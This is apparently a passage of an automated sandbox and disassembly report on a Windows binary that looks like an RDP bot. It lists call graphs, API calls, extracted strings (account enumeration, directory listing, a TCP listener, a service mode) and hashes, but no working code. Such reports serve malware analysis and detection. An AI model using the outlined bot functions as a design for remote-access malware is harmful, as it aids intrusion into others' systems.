7ff7aabd15a1 60427->60429 60429->60252 60429->60260 60431 7ff7aabd1572 60431->60425 60433 7ff7aabd15f1 60431->60433 60438 7ff7aabd3505 60437->60438 60439 7ff7aabd347a 60437->60439 60440 7ff7aabd2ef2 6 API calls 60438->60440 60441 7ff7aabd4fc5 30 API calls 60439->60441 60461 7ff7aabd75d2 60460->60461 60462 7ff7aabd759c 60460->60462 60465 7ff7aabd2ef2 6 API calls 60461->60465 60463 7ff7aabd75a1 60462->60463 60464 7ff7aabd7602 60462->60464 60466 7ff7aabd7632 60463->60466 60467 7ff7aabd75aa 60463->60467 60468 7ff7aabd2ef2 6 API calls 60464->60468 60471 7ff7aabd75b7 60465->60471 60469 7ff7aabd2ef2 6 API calls 60466->60469 60473 7ff7aabd744c 8 API calls 60467->60473 60468->60471 60469->60471 60471->60333 60471->60336 60472 7ff7aabd75af 60472->60471 60473->60472 60475 7ff7aabd2312 LoadLibraryA 60474->60475 60476 7ff7aabd233b 60474->60476 60477 7ff7aabd2320 60475->60477 60478 7ff7aabd233e GetLastError 60475->60478 60476->60478 60479 7ff7aabd2ef2 6 API calls 60477->60479 60480 7ff7aabd2ef2 6 API calls 60478->60480 60481 7ff7aabd2339 60479->60481 60480->60481 60481->60412 60482 7ff7aabd2283 60481->60482 60483 7ff7aabd22a0 GetProcAddress 60482->60483 60484 7ff7aabd22d1 60482->60484 60485 7ff7aabd22d6 GetLastError 60483->60485 60486 7ff7aabd22b1 60483->60486 60484->60485 60488 7ff7aabd2ef2 6 API calls 60485->60488 60487 7ff7aabd2ef2 6 API calls 60486->60487 60489 7ff7aabd22cf 60487->60489 60488->60489 60489->60389 60489->60397 60491 7ff7aabd926b 60490->60491 60492 7ff7aabd92ca 60490->60492 60494 7ff7aabd9274 60491->60494 60495 7ff7aabd932d 60491->60495 60493 7ff7aabd2ef2 6 API calls 60492->60493 60515 7ff7aabd9323 60492->60515 60493->60515 60497 7ff7aabd9360 60494->60497 60498 7ff7aabd927d 60494->60498 60496 7ff7aabd2ef2 6 API calls 60495->60496 60496->60515 60499 7ff7aabd2ef2 6 API calls 60497->60499 60500 7ff7aabd9393 60498->60500 60501 7ff7aabd9286 RegOpenKeyExA 60498->60501 60499->60515 60502 7ff7aabd2ef2 6 API calls 60500->60502 60504 7ff7aabd93c6 RegQueryValueExA 
60501->60504 60505 7ff7aabd92ad 60501->60505 60502->60515 60503 7ff7aabd9526 60510 7ff7aabd96ec 60503->60510 60512 7ff7aabd2ef2 6 API calls 60503->60512 60514 7ff7aabd93f4 60504->60514 60516 7ff7aabd9447 RegCloseKey 60504->60516 60506 7ff7aabd2ef2 6 API calls 60505->60506 60506->60492 60507 7ff7aabd96c9 60509 7ff7aabd2ef2 6 API calls 60507->60509 60511 7ff7aabd9569 60509->60511 60511->60408 60512->60511 60514->60516 60515->60503 60515->60507 60516->60515 60518 7ff7aabd13fd strlen 60517->60518 60519 7ff7aabd13e7 60517->60519 60570 7ff7aabd6e87 60518->60570 60519->60518 60520 7ff7aabd13ec strlen 60519->60520 60520->60518 60522 7ff7aabd1425 60524 7ff7aabd1487 strlen 60522->60524 60525 7ff7aabd14c8 60522->60525 60528 7ff7aabd14b4 strlen 60522->60528 60529 7ff7aabd1436 60522->60529 60576 7ff7aabd47a3 60522->60576 60526 7ff7aabd6e87 8 API calls 60524->60526 60600 7ff7aabd4788 FindClose 60525->60600 60526->60522 60528->60522 60529->60431 60530 7ff7aabd7750 60529->60530 60571 7ff7aabd6ea5 60570->60571 60572 7ff7aabd6e90 GetFileAttributesA 60570->60572 60574 7ff7aabd2ef2 6 API calls 60571->60574 60573 7ff7aabd6ed5 GetLastError 60572->60573 60575 7ff7aabd6e9b 60572->60575 60573->60575 60574->60575 60575->60522 60577 7ff7aabd47c3 60576->60577 60596 7ff7aabd4809 60576->60596 60579 7ff7aabd4862 60577->60579 60580 7ff7aabd47cc 60577->60580 60600->60529 60845 7ffb22769f6c InitializeCriticalSectionAndSpinCount 60755->60845 60758 7ffb22761b96 60759 7ffb22761b9a 60758->60759 60914 7ffb2276296e WSAStartup 60758->60914 60759->60281 61072 7ffb2270427c InitializeCriticalSectionAndSpinCount 60768->61072 60776 7ffb227054c6 60782 7ffb227054ca 60776->60782 61141 7ffb227062ae WSAStartup 60776->61141 60782->60281 61288 7ffb23ab221c InitializeCriticalSectionAndSpinCount 60783->61288 60786 7ffb23ab90e6 60787 7ffb23ab90ea 60786->60787 61355 7ffb23ab328e WSAStartup 60786->61355 60787->60281 60792 7ffb23ab9131 60792->60787 61363 7ffb23ab3aa7 InitializeCriticalSectionAndSpinCount 60792->61363 61497 
7ffb23b0794c InitializeCriticalSectionAndSpinCount 60794->61497 60797 7ffb23b08a79 60798 7ffb23b08a7d 60797->60798 61566 7ffb23b01fce WSAStartup 60797->61566 60801 7ffb23b077a2 6 API calls 60798->60801 60811 7ffb23b08a9a 60801->60811 60803 7ffb23b08aeb 60803->60798 61574 7ffb23b064f8 InitializeCriticalSectionAndSpinCount 60803->61574 60811->60281 61779 7ffb2273c9fc InitializeCriticalSectionAndSpinCount 60812->61779 60815 7ffb2273ff56 60828 7ffb2273ff5a 60815->60828 61848 7ffb22738b63 InitializeCriticalSectionAndSpinCount 60815->61848 60828->60281 62026 7ffb23ad14fc InitializeCriticalSectionAndSpinCount 60829->62026 60836 7ffb23ad12a6 60841 7ffb23ad12aa 60836->60841 62095 7ffb23ad4b5e WSAStartup 60836->62095 60837 7ffb23ad12f1 60837->60841 62103 7ffb23ad2b78 InitializeCriticalSectionAndSpinCount 60837->62103 60841->60281 60842->60280 60843->60281 60844->60281 60846 7ffb2276a0c0 GetLastError 60845->60846 60847 7ffb22769f9a 60845->60847 60848 7ffb22769dc2 12 API calls 60846->60848 60950 7ffb22764ac0 GetModuleHandleExA 60847->60950 60859 7ffb2276a099 60848->60859 60853 7ffb22769fd4 strlen 60855 7ffb22769fed 60853->60855 60856 7ffb2276a003 60853->60856 60854 7ffb22769dc2 12 API calls 60860 7ffb22761b92 60854->60860 60855->60856 60861 7ffb22769ff2 strlen 60855->60861 60857 7ffb2276a028 strlen fopen 60856->60857 60858 7ffb2276a008 strcat strlen 60856->60858 60862 7ffb2276a18d 60857->60862 60863 7ffb2276a077 60857->60863 60858->60857 60859->60854 60860->60758 60869 7ffb2276ad94 60860->60869 60861->60856 60865 7ffb22769dc2 12 API calls 60862->60865 60967 7ffb22769dc2 60863->60967 60865->60859 60870 7ffb2276adf9 60869->60870 60871 7ffb2276adb6 60869->60871 60872 7ffb22769dc2 12 API calls 60870->60872 60987 7ffb2276aa00 60871->60987 60874 7ffb22761bd1 60872->60874 60874->60759 60879 7ffb227644cc 60874->60879 60876 7ffb2276ae29 _errno _strtoui64 _errno 60876->60874 60877 7ffb2276ae5c _errno 60876->60877 60878 7ffb22769dc2 12 API calls 60877->60878 60878->60874 61029 
7ffb22764df4 60879->61029 60915 7ffb227629b2 60914->60915 60916 7ffb2276298a 60914->60916 60918 7ffb22769dc2 12 API calls 60915->60918 60917 7ffb22769dc2 12 API calls 60916->60917 60920 7ffb22761be1 60917->60920 60919 7ffb227629cb 60918->60919 60921 7ffb22769dc2 12 API calls 60919->60921 60920->60759 60922 7ffb227617f8 InitializeCriticalSectionAndSpinCount 60920->60922 60921->60920 60923 7ffb2276189b GetLastError 60922->60923 60924 7ffb2276181d CreateThread 60922->60924 60927 7ffb22769dc2 12 API calls 60923->60927 60925 7ffb22761869 60924->60925 60926 7ffb22761973 GetLastError 60924->60926 60928 7ffb22761a6c 60925->60928 60929 7ffb22761876 60925->60929 60930 7ffb22769dc2 12 API calls 60926->60930 60927->60929 60932 7ffb22769dc2 12 API calls 60928->60932 60931 7ffb22769dc2 12 API calls 60929->60931 60930->60929 60951 7ffb22764af2 GetLastError 60950->60951 60952 7ffb22764ae8 60950->60952 60953 7ffb22769dc2 12 API calls 60951->60953 60954 7ffb227689db 60952->60954 60953->60952 60955 7ffb22768a22 60954->60955 60956 7ffb227689ec 60954->60956 60957 7ffb22769dc2 12 API calls 60955->60957 60958 7ffb227689f1 60956->60958 60959 7ffb22768a52 60956->60959 60965 7ffb22768a07 60957->60965 60961 7ffb22768a82 60958->60961 60962 7ffb227689fa 60958->60962 60960 7ffb22769dc2 12 API calls 60959->60960 60960->60965 60963 7ffb22769dc2 12 API calls 60961->60963 60978 7ffb2276889c 14 API calls 60962->60978 60963->60965 60965->60853 60965->60859 60966 7ffb227689ff 60966->60965 60968 7ffb22769dd0 60967->60968 60979 7ffb2276d580 60968->60979 60978->60966 60988 7ffb2276aa11 60987->60988 60989 7ffb2276aa49 60987->60989 60995 7ffb2276a6e9 60988->60995 60991 7ffb22769dc2 12 API calls 60989->60991 60993 7ffb2276aa28 60991->60993 60993->60874 60993->60876 60996 7ffb2276a701 60995->60996 60997 7ffb2276a71c 60995->60997 60998 7ffb2276a74f 60996->60998 60999 7ffb2276a706 60996->60999 61000 7ffb22769dc2 12 API calls 60997->61000 61002 7ffb22769dc2 12 API calls 60998->61002 61001 7ffb2276a782 
60999->61001 61003 7ffb2276a70b 60999->61003 61004 7ffb2276a745 61000->61004 61005 7ffb22769dc2 12 API calls 61001->61005 61002->61004 61006 7ffb2276a7ec 61003->61006 61007 7ffb2276a7c1 strcmp 61003->61007 61010 7ffb22769dc2 12 API calls 61004->61010 61005->61004 61006->61004 61007->61003 61030 7ffb22764e02 LoadLibraryA 61029->61030 61031 7ffb22764e2b 61029->61031 61032 7ffb22764e2e GetLastError 61030->61032 61033 7ffb22764e10 61030->61033 61031->61032 61034 7ffb22769dc2 12 API calls 61032->61034 61035 7ffb22769dc2 12 API calls 61033->61035 61073 7ffb227042aa 61072->61073 61074 7ffb227043d0 GetLastError 61072->61074 61185 7ffb22702700 GetModuleHandleExA 61073->61185 61075 7ffb227040d2 6 API calls 61074->61075 61084 7ffb227043a9 61075->61084 61080 7ffb227042e4 strlen 61081 7ffb22704313 61080->61081 61082 7ffb227042fd 61080->61082 61087 7ffb22704338 strlen fopen 61081->61087 61088 7ffb22704318 strcat strlen 61081->61088 61082->61081 61085 7ffb22704302 strlen 61082->61085 61083 7ffb227040d2 6 API calls 61086 7ffb227043c6 61083->61086 61084->61083 61085->61081 61086->60776 61096 7ffb227051c4 61086->61096 61089 7ffb22704387 61087->61089 61090 7ffb2270449d 61087->61090 61088->61087 61091 7ffb227040d2 6 API calls 61089->61091 61092 7ffb227040d2 6 API calls 61090->61092 61093 7ffb227043a1 61091->61093 61092->61084 61093->61084 61094 7ffb2270450d 61093->61094 61097 7ffb22705229 61096->61097 61098 7ffb227051e6 61096->61098 61099 7ffb227040d2 6 API calls 61097->61099 61203 7ffb22704e30 61098->61203 61101 7ffb227051ff 61099->61101 61101->60782 61106 7ffb2270210c 61101->61106 61103 7ffb22705259 _errno _strtoui64 _errno 61103->61101 61104 7ffb2270528c _errno 61103->61104 61105 7ffb227040d2 6 API calls 61104->61105 61105->61101 61245 7ffb22702a34 61106->61245 61142 7ffb227062ca 61141->61142 61143 7ffb227062f2 61141->61143 61144 7ffb227040d2 6 API calls 61142->61144 61145 7ffb227040d2 6 API calls 61143->61145 61147 7ffb22705511 61144->61147 61146 7ffb2270630b 61145->61146 61148 
7ffb227040d2 6 API calls 61146->61148 61147->60782 61149 7ffb22708f74 InitializeCriticalSectionAndSpinCount 61147->61149 61148->61147 61150 7ffb22708f8f 61149->61150 61151 7ffb22708fc4 GetLastError 61149->61151 61152 7ffb227040d2 6 API calls 61150->61152 61153 7ffb227040d2 6 API calls 61151->61153 61154 7ffb2270551a 61152->61154 61155 7ffb22708fe2 61153->61155 61154->60782 61186 7ffb22702728 61185->61186 61187 7ffb22702732 GetLastError 61185->61187 61189 7ffb2270ce6b 61186->61189 61188 7ffb227040d2 6 API calls 61187->61188 61188->61186 61190 7ffb2270ce7c 61189->61190 61191 7ffb2270ceb2 61189->61191 61192 7ffb2270ce81 61190->61192 61193 7ffb2270cee2 61190->61193 61194 7ffb227040d2 6 API calls 61191->61194 61196 7ffb2270cf12 61192->61196 61197 7ffb2270ce8a 61192->61197 61195 7ffb227040d2 6 API calls 61193->61195 61201 7ffb227042da 61194->61201 61195->61201 61198 7ffb227040d2 6 API calls 61196->61198 61202 7ffb2270cd2c 8 API calls 61197->61202 61198->61201 61200 7ffb2270ce8f 61200->61201 61201->61080 61201->61084 61202->61200 61204 7ffb22704e79 61203->61204 61205 7ffb22704e41 61203->61205 61206 7ffb227040d2 6 API calls 61204->61206 61211 7ffb22704b19 61205->61211 61209 7ffb22704e58 61206->61209 61209->61101 61209->61103 61212 7ffb22704b31 61211->61212 61213 7ffb22704b4c 61211->61213 61214 7ffb22704b36 61212->61214 61215 7ffb22704b7f 61212->61215 61216 7ffb227040d2 6 API calls 61213->61216 61217 7ffb22704bb2 61214->61217 61221 7ffb22704b3b 61214->61221 61218 7ffb227040d2 6 API calls 61215->61218 61220 7ffb22704b75 61216->61220 61219 7ffb227040d2 6 API calls 61217->61219 61218->61220 61219->61220 61226 7ffb227040d2 6 API calls 61220->61226 61222 7ffb22704c1c 61221->61222 61223 7ffb22704bf1 strcmp 61221->61223 61222->61220 61223->61221 61246 7ffb22702a42 LoadLibraryA 61245->61246 61247 7ffb22702a6b 61245->61247 61248 7ffb22702a50 61246->61248 61249 7ffb22702a6e GetLastError 61246->61249 61247->61249 61250 7ffb227040d2 6 API calls 61248->61250 61251 7ffb227040d2 6 API 
calls 61249->61251 61289 7ffb23ab224a 61288->61289 61290 7ffb23ab2370 GetLastError 61288->61290 61394 7ffb23ab4e20 GetModuleHandleExA 61289->61394 61291 7ffb23ab2072 6 API calls 61290->61291 61300 7ffb23ab2349 61291->61300 61296 7ffb23ab2284 strlen 61298 7ffb23ab22b3 61296->61298 61299 7ffb23ab229d 61296->61299 61297 7ffb23ab2072 6 API calls 61311 7ffb23ab2366 61297->61311 61302 7ffb23ab22d8 strlen fopen 61298->61302 61303 7ffb23ab22b8 strcat strlen 61298->61303 61299->61298 61301 7ffb23ab22a2 strlen 61299->61301 61300->61297 61301->61298 61304 7ffb23ab2327 61302->61304 61305 7ffb23ab243d 61302->61305 61303->61302 61306 7ffb23ab2072 6 API calls 61304->61306 61307 7ffb23ab2072 6 API calls 61305->61307 61308 7ffb23ab2341 61306->61308 61307->61300 61308->61300 61309 7ffb23ab24ad 61308->61309 61311->60786 61312 7ffb23ab1d84 61311->61312 61313 7ffb23ab1da6 61312->61313 61314 7ffb23ab1de9 61312->61314 61412 7ffb23ab19f0 61313->61412 61315 7ffb23ab2072 6 API calls 61314->61315 61317 7ffb23ab1dbf 61315->61317 61317->60787 61322 7ffb23ab482c 61317->61322 61319 7ffb23ab1e19 _errno _strtoui64 _errno 61319->61317 61320 7ffb23ab1e4c _errno 61319->61320 61321 7ffb23ab2072 6 API calls 61320->61321 61321->61317 61454 7ffb23ab5154 61322->61454 61356 7ffb23ab32aa 61355->61356 61357 7ffb23ab32d2 61355->61357 61359 7ffb23ab2072 6 API calls 61356->61359 61358 7ffb23ab2072 6 API calls 61357->61358 61360 7ffb23ab32eb 61358->61360 61361 7ffb23ab32c4 61359->61361 61362 7ffb23ab2072 6 API calls 61360->61362 61361->60792 61362->61361 61364 7ffb23ab3c52 GetLastError 61363->61364 61365 7ffb23ab3ad0 InitializeCriticalSectionAndSpinCount 61363->61365 61368 7ffb23ab2072 6 API calls 61364->61368 61366 7ffb23ab3afd 61365->61366 61367 7ffb23ab3d6e GetLastError 61365->61367 61395 7ffb23ab2266 61394->61395 61396 7ffb23ab4e52 GetLastError 61394->61396 61398 7ffb23ab859b 61395->61398 61397 7ffb23ab2072 6 API calls 61396->61397 61397->61395 61399 7ffb23ab85ac 61398->61399 61400 7ffb23ab85e2 61398->61400 
61402 7ffb23ab8612 61399->61402 61403 7ffb23ab85b1 61399->61403 61401 7ffb23ab2072 6 API calls 61400->61401 61409 7ffb23ab227a 61401->61409 61404 7ffb23ab2072 6 API calls 61402->61404 61405 7ffb23ab85ba 61403->61405 61406 7ffb23ab8642 61403->61406 61404->61409 61411 7ffb23ab845c 8 API calls 61405->61411 61408 7ffb23ab2072 6 API calls 61406->61408 61408->61409 61409->61296 61409->61300 61410 7ffb23ab85bf 61410->61409 61411->61410 61413 7ffb23ab1a39 61412->61413 61414 7ffb23ab1a01 61412->61414 61415 7ffb23ab2072 6 API calls 61413->61415 61420 7ffb23ab16d9 61414->61420 61419 7ffb23ab1a18 61415->61419 61419->61317 61419->61319 61421 7ffb23ab170c 61420->61421 61422 7ffb23ab16f1 61420->61422 61423 7ffb23ab2072 6 API calls 61421->61423 61424 7ffb23ab16f6 61422->61424 61425 7ffb23ab173f 61422->61425 61431 7ffb23ab1735 61423->61431 61427 7ffb23ab1772 61424->61427 61429 7ffb23ab16fb 61424->61429 61426 7ffb23ab2072 6 API calls 61425->61426 61426->61431 61428 7ffb23ab2072 6 API calls 61427->61428 61428->61431 61430 7ffb23ab17dc 61429->61430 61432 7ffb23ab17b1 strcmp 61429->61432 61430->61431 61434 7ffb23ab2072 6 API calls 61431->61434 61432->61429 61455 7ffb23ab518b 61454->61455 61456 7ffb23ab5162 LoadLibraryA 61454->61456 61457 7ffb23ab518e GetLastError 61455->61457 61456->61457 61458 7ffb23ab5170 61456->61458 61460 7ffb23ab2072 6 API calls 61457->61460 61459 7ffb23ab2072 6 API calls 61458->61459 61461 7ffb23ab4840 61459->61461 61460->61461 61498 7ffb23b0797a 61497->61498 61499 7ffb23b07aa0 GetLastError 61497->61499 61501 7ffb23b07400 8 API calls 61498->61501 61500 7ffb23b077a2 6 API calls 61499->61500 61509 7ffb23b07a79 61500->61509 61502 7ffb23b07996 61501->61502 61615 7ffb23b05dcb 61502->61615 61505 7ffb23b079b4 strlen 61507 7ffb23b079e3 61505->61507 61508 7ffb23b079cd 61505->61508 61506 7ffb23b077a2 6 API calls 61510 7ffb23b07a96 61506->61510 61512 7ffb23b07a08 strlen fopen 61507->61512 61513 7ffb23b079e8 strcat strlen 61507->61513 61508->61507 61511 7ffb23b079d2 strlen 

                                    Control-flow Graph

                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
                                    • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
                                    • API String ID: 3624467404-104752423
                                    • Opcode ID: f77c6fcf1061f4f146997536a93bdebe5b0009022fe2d2267c1482a4f8b7796d
                                    • Instruction ID: 84c31fd12badb862192710dbee6de7bbf1bf38d420e3b2df10f191e183746b16
                                    • Opcode Fuzzy Hash: f77c6fcf1061f4f146997536a93bdebe5b0009022fe2d2267c1482a4f8b7796d
                                    • Instruction Fuzzy Hash: 57F191A2A0C68282FB5A8B34EC503B963A1EF86744F144136D54DC77B8DEBCEE49C741
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmp
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                    • API String ID: 4253334766-1535167640
                                    • Opcode ID: 4949fe7bc8a222cefbf3ead6bf23d32448817b897e803bddc4395f5859a246e4
                                    • Instruction ID: ca6aa27477e8789c38f7b6236143183bf550c739b53148537807e7d811fd1453
                                    • Opcode Fuzzy Hash: 4949fe7bc8a222cefbf3ead6bf23d32448817b897e803bddc4395f5859a246e4
                                    • Instruction Fuzzy Hash: CF6119B1E0D5D385FA225B75EE847B862506F0B758F840132DA5ECA2F0DEECED45A341
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
                                    • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                    • API String ID: 1094913617-1535167640
                                    • Opcode ID: 995f115fb8ba395f81a05c9b835082c6746a5ca2570fbf6c25dc8641196da954
                                    • Instruction ID: 055043e2939a4c351b9fdb6675b5f177250560d68095fa9063eba4ca93ef672c
                                    • Opcode Fuzzy Hash: 995f115fb8ba395f81a05c9b835082c6746a5ca2570fbf6c25dc8641196da954
                                    • Instruction Fuzzy Hash: 3E614A21E0F683C9FA607B55E4403F8E254AF20395FD641B2D99E5B2F4DE2CA887C361
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmp
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: Heap$Free$Process$AllocBufferEnumLocalUsermemcpy
                                    • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                                    • API String ID: 1987963910-3382179125
                                    • Opcode ID: 99cbaf113bc8b4c80a5db71fbd9b66ee8517c08e3d22a6d9195eee4f8278679b
                                    • Instruction ID: b43c35f8873d17290d98659be593122c030b351737c3432112bf464805dab793
                                    • Opcode Fuzzy Hash: 99cbaf113bc8b4c80a5db71fbd9b66ee8517c08e3d22a6d9195eee4f8278679b
                                    • Instruction Fuzzy Hash: 54617FA1A0D6C681FA269B74EC803B96650AF86354F140035E94DC76B4EEFDEE898701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208866783.00007FFB23AB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFB23AB0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208840934.00007FFB23AB0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208893229.00007FFB23AC0000.00000002.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208920156.00007FFB23AC8000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208953322.00007FFB23ACB000.00000004.00000001.01000000.0000000B.sdmp
                                    • Associated: 0000001D.00000002.2208975635.00007FFB23ACC000.00000008.00000001.01000000.0000000B.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ab0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                    • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                    • API String ID: 3590747132-3524496754
                                    • Opcode ID: 1e281d2b764eda443bfba74c065725a3021d88745858eb50cd21d1acb4268d8f
                                    • Instruction ID: ea52b06ad4462447cf42324add4dd5ef2cd59e263cb2911047243c37c747cd06
                                    • Opcode Fuzzy Hash: 1e281d2b764eda443bfba74c065725a3021d88745858eb50cd21d1acb4268d8f
                                    • Instruction Fuzzy Hash: 2D31C3A0A1868681EA229B35EC0027C3691BF677B4F0C4776D87E273F9EE3DE4048740
                                    APIs
                                    • strcmp.MSVCRT ref: 00007FF7AABD1DD4
                                    • strcmp.MSVCRT ref: 00007FF7AABD1DE7
                                    • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF7AABD1E23
                                    • _read.MSVCRT ref: 00007FF7AABD1E79
                                    • GetLastError.KERNEL32 ref: 00007FF7AABD1E98
                                      • Part of subcall function 00007FF7AABD1A63: FreeLibrary.KERNEL32(?,?,00000000,0000027B435613D0,00007FF7AABD1E50,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508), ref: 00007FF7AABD1AA1
                                      • Part of subcall function 00007FF7AABD1A63: GetProcessHeap.KERNEL32(?,?,00000000,0000027B435613D0,00007FF7AABD1E50,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508), ref: 00007FF7AABD1AD4
                                      • Part of subcall function 00007FF7AABD1A63: HeapFree.KERNEL32(?,?,00000000,0000027B435613D0,00007FF7AABD1E50,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508), ref: 00007FF7AABD1AE5
                                      • Part of subcall function 00007FF7AABD1B1C: GetProcessHeap.KERNEL32(?,?,00000000,00007FF7AABD1E55,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508,00000000), ref: 00007FF7AABD1B4D
                                      • Part of subcall function 00007FF7AABD1B1C: HeapFree.KERNEL32(?,?,00000000,00007FF7AABD1E55,?,?,?,?,?,?,00000001,00007FF7AABD1FC3,?,?,00007FF7AABE8508,00000000), ref: 00007FF7AABD1B5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
                                    • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                                    • API String ID: 3617873859-308889057
                                    • Opcode ID: c6fdafb6e61b9dcc75db4515785ec9ddd183118bff9fd0d5da33b544536fa653
